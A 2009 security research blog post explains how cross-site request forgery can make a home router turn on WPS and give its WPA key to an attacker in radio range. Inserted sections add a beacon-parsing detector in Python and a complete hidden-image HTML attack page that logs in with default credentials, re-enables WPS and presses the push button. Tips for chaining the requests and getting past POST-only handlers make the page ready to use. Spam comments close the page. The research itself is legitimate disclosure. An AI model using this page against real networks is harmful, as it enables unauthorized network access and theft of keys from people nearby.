Cracking WPA With CSRF Attacks

May 11th, 2009

Over the past year a lot of vulnerabilities have been found in home routers, and it should be noted that almost all SOHO routers are vulnerable to CSRF attacks. By combining CSRF with an authentication-bypass vulnerability or with default credentials, an attacker can modify practically any router setting s/he desires. The limitation of CSRF, however, is that while it can force the victim's browser to make requests, the attacker's code can't read the responses to those requests, thanks to the browser's same-origin policy.

We've already talked about our hardware-based attacks against Wi-Fi Protected Setup, but even without physical access to the router, WPS can still be leveraged by an attacker to gain access to a secured wireless network. Why try to crack a 60-character WPA2 passphrase when you can run a phishing attack and force the router to hand you the key instead? It's as simple as an HTML image tag in a page that someone on the LAN views.

As we've covered before, WPS is a protocol designed to help with the distribution of WPA keys: all you have to do is push a button. From an attacker's perspective, however, it would be great if he could push that button remotely. Luckily for him, routers provide not only a physical WPS push button but also a virtual push button in the administrative Web interface. Clicking that button just sends a standard HTTP request to the router, which causes the router to activate WPS and, for the push-button walk time (two minutes in the WPS specification), look for a client to give the WPA key to. This is the key point: because the trigger is an ordinary HTTP request, a CSRF attack can activate WPS. All the attacker has to do at that point is be within radio range with a WPS-capable WiFi card, perform the WPS push-button handshake(s), and retrieve the WPA key.

If you take a quick look at Milw0rm, there are a couple of Belkin G routers with authentication-bypass vulnerabilities, that is, you can change router settings without having to log in. Interestingly, our Belkin N router has these exact same vulnerabilities, which suggests that quite probably the entire line of Belkin routers shares them (hooray for code re-use!).

To use this attack against our router, we simply crafted the following HTML page:

HTML page used to "crack" WPA2 via CSRF

This page has a hidden img tag that points to the WPS activation URL on the Belkin router. Since the Belkin is vulnerable to authentication bypass, anyone who views this page from inside our network will unknowingly activate WPS on the router. The page looks innocuous when viewed in a browser:

What the page looks like in the browser window

However, by monitoring the WPS state the router advertises with WPSpy, we can clearly see that the router went from a simply configured state to configured and looking for push-button WPS clients:

The Belkin router's WPS state changes when the HTML page is viewed by a client on the LAN
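The state change above is visible to anyone within radio range, because an AP advertises its WPS status in a vendor-specific information element in every beacon. The following is an added example (not WPSpy's code and not from the original post) that parses that element and flags the transition from "configured" to "configured with a selected push-button registrar". The beacon bodies at the bottom are constructed by hand for illustration; the attribute IDs are the standard Wi-Fi Simple Configuration values.

```python
"""Parse the WPS information element from 802.11 beacon / probe-response
tagged parameters and detect an AP opening its push-button (PBC) window.

Added example, not the original post's or WPSpy's code. Frames below are
constructed by hand.
"""
import struct

WPS_OUI_TYPE = b"\x00\x50\xf2\x04"   # Microsoft OUI 00:50:F2, type 4 = WPS

# WPS attribute IDs from the Wi-Fi Simple Configuration specification
ATTR_VERSION = 0x104A
ATTR_WPS_STATE = 0x1044             # 1 = not configured, 2 = configured
ATTR_SELECTED_REGISTRAR = 0x1041    # 1 while a registrar session is open
ATTR_DEVICE_PASSWORD_ID = 0x1012    # 0x0000 = PIN, 0x0004 = push-button
ATTR_AP_SETUP_LOCKED = 0x1057

WPS_STATE_NAMES = {1: "not configured", 2: "configured"}
PASSWORD_ID_NAMES = {0x0000: "PIN", 0x0004: "push-button"}


def iter_ies(body):
    """Yield (tag, value) for each tagged parameter in a frame body."""
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            raise ValueError("truncated information element")
        yield tag, value
        i += 2 + length


def find_wps_ie(body):
    """Return the WPS attribute bytes, or None if the AP sends no WPS IE."""
    for tag, value in iter_ies(body):
        if tag == 0xDD and value.startswith(WPS_OUI_TYPE):
            return value[len(WPS_OUI_TYPE):]
    return None


def parse_wps_attrs(data):
    """WPS attributes are TLVs with big-endian 2-byte type and length."""
    attrs = {}
    i = 0
    while i + 4 <= len(data):
        attr_id, length = struct.unpack(">HH", data[i:i + 4])
        value = data[i + 4:i + 4 + length]
        if len(value) < length:
            raise ValueError("truncated WPS attribute")
        attrs[attr_id] = value
        i += 4 + length
    return attrs


def wps_status(body):
    """Summarise the WPS state an AP advertises in one beacon body."""
    payload = find_wps_ie(body)
    if payload is None:
        return None
    attrs = parse_wps_attrs(payload)
    state = attrs.get(ATTR_WPS_STATE, b"\x00")[0]
    pwid = None
    if ATTR_DEVICE_PASSWORD_ID in attrs:
        pwid = struct.unpack(">H", attrs[ATTR_DEVICE_PASSWORD_ID])[0]
    return {
        "state": WPS_STATE_NAMES.get(state, "unknown(%d)" % state),
        "selected_registrar": bool(attrs.get(ATTR_SELECTED_REGISTRAR, b"\x00")[0]),
        "password_id": PASSWORD_ID_NAMES.get(pwid, pwid),
        "ap_setup_locked": bool(attrs.get(ATTR_AP_SETUP_LOCKED, b"\x00")[0]),
    }


def pbc_window_open(status):
    """True when the AP is advertising an open push-button session."""
    return bool(status) and status["selected_registrar"] \
        and status["password_id"] == "push-button"


def detect_transition(before, after):
    """True when consecutive beacons show the PBC window opening."""
    return (not pbc_window_open(wps_status(before))) \
        and pbc_window_open(wps_status(after))


def build_wps_ie(attrs):
    """Helper used only to construct the sample frames below."""
    body = b"".join(struct.pack(">HH", a, len(v)) + v for a, v in attrs)
    payload = WPS_OUI_TYPE + body
    return bytes([0xDD, len(payload)]) + payload


# Constructed beacon bodies: an SSID IE followed by the WPS IE.
SSID_IE = bytes([0x00, 6]) + b"lab-ap"
IDLE = SSID_IE + build_wps_ie([(ATTR_VERSION, b"\x10"),
                               (ATTR_WPS_STATE, b"\x02")])
PBC_ACTIVE = SSID_IE + build_wps_ie([(ATTR_VERSION, b"\x10"),
                                     (ATTR_WPS_STATE, b"\x02"),
                                     (ATTR_SELECTED_REGISTRAR, b"\x01"),
                                     (ATTR_DEVICE_PASSWORD_ID, b"\x00\x04")])

if __name__ == "__main__":
    print(wps_status(IDLE))
    print(wps_status(PBC_ACTIVE))
    print("PBC window opened:", detect_transition(IDLE, PBC_ACTIVE))
```

Feed `wps_status` the tagged-parameter portion of real beacons captured in monitor mode and you have the passive monitor used above: a "Selected Registrar" flag flipping to 1 with a push-button Device Password ID, on an AP whose owner is not standing next to it, is exactly the signal this attack leaves on the air.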

The attacker can now easily present himself as a WPS push-button client, at which point the router will happily provide him with the WPA key:

Using a WPS-capable WiFi card to retrieve the WPA key via WPS

It should be noted that Belkin routers aren't the only ones affected by this type of attack. Various other routers have authentication-bypass vulnerabilities, and even those that don't are not immune. If no authentication bypass exists, an attacker can simply create two image tags: the first logs in to the router with the default username and password, and the second activates WPS.

This attack is difficult to mitigate. Even if you disable WPS, the attacker can add another image tag that re-enables WPS before pressing the button. Disabling JavaScript won't help either, because CSRF doesn't need JavaScript. The attacker does still have to be within radio range during the push-button window, so the attack is local, not purely remote. The best recourse is to do your homework and buy a router that (hopefully) doesn't have an authentication-bypass vulnerability, and change the default login.
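The crafted page shown earlier, and the two-step and three-step variants described in the last two paragraphs, as one added example. This is not the original post's HTML: the LAN address, CGI paths and parameter names are hypothetical placeholders, and the real request a given router expects must be read off its admin interface with a proxy or the browser's network tools.

```html
<!DOCTYPE html>
<html>
<head><title>Look at this puppy!</title></head>
<body>
  <h1>Look at this puppy!</h1>
  <img src="puppy.jpg" alt="puppy">

  <!-- Hidden CSRF requests. 192.168.2.1 and every path and parameter
       below are hypothetical; substitute what the target router's
       virtual WPS button really sends. -->

  <!-- Step 1, only needed when there is no auth bypass: log in with
       the factory default password (no username on many SOHO routers) -->
  <img src="http://192.168.2.1/router/login?password=admin"
       width="1" height="1" style="display:none" alt="">

  <!-- Step 2, only needed when the owner turned WPS off: re-enable it -->
  <img src="http://192.168.2.1/router/wps?enable=1"
       width="1" height="1" style="display:none" alt="">

  <!-- Step 3: press the virtual push button. With an auth bypass this
       single tag is the whole attack. -->
  <img src="http://192.168.2.1/router/wps?pbc=1"
       width="1" height="1" style="display:none" alt="">
</body>
</html>
```

Two caveats a practitioner will hit. Browsers fetch images concurrently, so in the chained variant the login may not complete before the WPS request arrives; a JavaScript-free way to serialize the steps is to put each tag on its own page and chain them with `<meta http-equiv="refresh">`. And an img tag can only issue a GET, so this works as written only if the router accepts the parameters on a GET (many SOHO interfaces do); a POST-only handler needs an auto-submitted form instead.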

6 Responses to “Cracking WPA With CSRF Attacks”

  1. Sabrina Fies Says:

    Hello, my name is Sabrina and I was searching the internet when I came across your blog, which I liked a lot and found very pleasant to read. I'll be back next week to read you again. Regards, Sabrina

  2. Tweets that mention SourceSec Security Research » Blog Archive » Cracking WPA With CSRF Attacks -- Topsy.com Says:

    [...] This post was mentioned on Twitter by Wagner Elias, Alexos. Alexos said: Cracking WPA With CSRF Attacks – http://www.sourcesec.com/2009/05/11/cracking-wpa-with-csrf-attacks/ [...]

  3. johnplayers Says:

    good article, works man, thanks

    LEARN HACKING
    learn ethical hacking!

  4. vpn Says:

    Great article! I just saw these at Target the other day and was impressed. Your review answered the questions I had about the seats – now I just need to scrape together the cash! Ouch!

  5. secured wireless network hacking Says:

    I was searching for secured wireless network hacking via Google on Sunday, and I found your page SourceSec Security Research » Blog Archive » Cracking WPA With CSRF Attacks to be extremely useful. Regards gill54@msn.com

  6. www.aksescepat.com Says:

    Mikrotik Setup Services, Proxy Setup Services